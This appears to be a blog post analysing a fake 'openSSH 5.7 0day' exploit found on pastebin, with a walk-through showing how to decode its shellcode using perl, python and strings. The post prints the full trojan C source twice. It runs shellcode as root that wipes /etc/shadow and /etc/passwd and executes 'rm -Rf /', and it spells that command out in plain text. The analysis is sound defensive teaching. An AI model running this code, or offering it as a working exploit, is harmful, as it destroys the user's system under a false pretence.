My IT projects : Basic Shellcode Analysis

Analyzing a shellcode is always instructive, it can give the penetration tester hints about what is used in it, or the penetration tester can learn about the techniques used, but he might also prevent himself to use destructive shellcodes.

After a few searches on the Internet I found a pastebin page to illustrate my example.

The following page (here) claims that there is a 0 day exploit for openSSH 5.7 0day exploit. The page do not give any instructions, and displays a basic C code to compile with GCC on a linux machine. Below you can see the code :

/*
openSSH 5.7 0day exploit
Off by One error in auth2-pubkey.c
Author: Chroniccommand
Usage: ./exploit
greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include 

void usage(char *argv[])
{
  printf("Usage: %s  \n", argv[0]);
  exit(1);
}

unsigned char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
"\xcd\x80";

int main(int argc, char *argv[])
{
  int uid = getuid();
  int port = 22, sock;
  struct hostent *host;
  struct sockaddr_in addr;

  if(uid !=0)
  {
    fprintf(stderr, "[!!]Error: You must be root\n");
    exit(1);
  }
  if(uid == 0)
  {
    printf("\t[+]Starting exploit..\n");
  }
  if(argc != 3)
       usage(argv);

  fprintf(stderr, "[!!]Exploit failed\n");
  (*(void(*)())shellcode)();
  exit(1);
  char payload[1024];
  memcpy(payload, &amp;shellcode, sizeof(shellcode));
  if(connect(sock,(struct sockaddr*)&amp;addr,sizeof(addr))==0)
  {
    printf("[+]Got shell\n");
    system("/bin/sh");
  }
  else if(connect(sock,(struct sockaddr*)&amp;addr, sizeof(addr))==-1)
  {
    fprintf(stderr, "[!!]Exploit failed\n");
    exit(1);
  }
}

openSSH 5.7 0day exploit

Off by One error in auth2-pubkey.c

Author: Chroniccommand

Usage: ./exploit

greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)

#include

void usage(char *argv[])

{

printf("Usage: %s \n", argv[0]);

exit(1);

}

unsigned char shellcode[] =

"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"

"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"

"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"

"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"

"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"

"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"

"\xcd\x80";

int main(int argc, char *argv[])

{

int uid = getuid();

int port = 22, sock;

struct hostent *host;

struct sockaddr_in addr;

if(uid !=0)

{

fprintf(stderr, "[!!]Error: You must be root\n");

exit(1);

}

if(uid == 0)

{

printf("\t[+]Starting exploit..\n");

}

if(argc != 3)

usage(argv);

fprintf(stderr, "[!!]Exploit failed\n");

(*(void(*)())shellcode)();

exit(1);

char payload[1024];

memcpy(payload, &shellcode, sizeof(shellcode));

if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)

{

printf("[+]Got shell\n");

system("/bin/sh");

}

else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)

{

fprintf(stderr, "[!!]Exploit failed\n");

exit(1);

}

The exploit seems to be fine, and I guess a lot of people tried that exploit on their own machine, without looking inside the exploit. Before executing that exploit, this is what they should have done, and this is actually what you should always do !

Analyse it without executing it

Below you may see how to reverse an exploit with Perl or Python :

$perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74
\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' &gt; exploit

$perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74

\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' > exploit

$strings exploit

1	$strings exploit

or in Python

$python -c 'print "x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68x00x68x2fx62x69x6ex89xe3x52xe8x39x00x00x00x65x63x68x6fx20x22x22x20x3ex20
x2fx65x74x63x2fx73x68x61x64x6fx77x20x3bx20x65x63x68x6fx20x22x22x20x3ex20x2fx65x74x63x2fx70x61x73x73x77x64x20x3bx20x72x6dx20x2dx52x66x20x2fx00x57x53x89xe1xcdx80"' &gt; exploit

$python -c 'print "x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68x00x68x2fx62x69x6ex89xe3x52xe8x39x00x00x00x65x63x68x6fx20x22x22x20x3ex20

x2fx65x74x63x2fx73x68x61x64x6fx77x20x3bx20x65x63x68x6fx20x22x22x20x3ex20x2fx65x74x63x2fx70x61x73x73x77x64x20x3bx20x72x6dx20x2dx52x66x20x2fx00x57x53x89xe1xcdx80"' > exploit

$strings exploit

1	$strings exploit

And this is the result that you should obtain:

Rfh-c
h/sh
h/bin
echo "" &gt; /etc/shadow ; echo "" &gt; /etc/passwd ; rm -Rf /

Rfh-c

h/sh

h/bin

echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /

As shown in the previous table the code tries to execute the a “rm -Rf” on our hard drive and delete everything !

That’s why it is important to always reverse the shellcodes you are using before hand !

My IT projects

Basic Shellcode Analysis

Post a Comment

Pages

Categories

Friends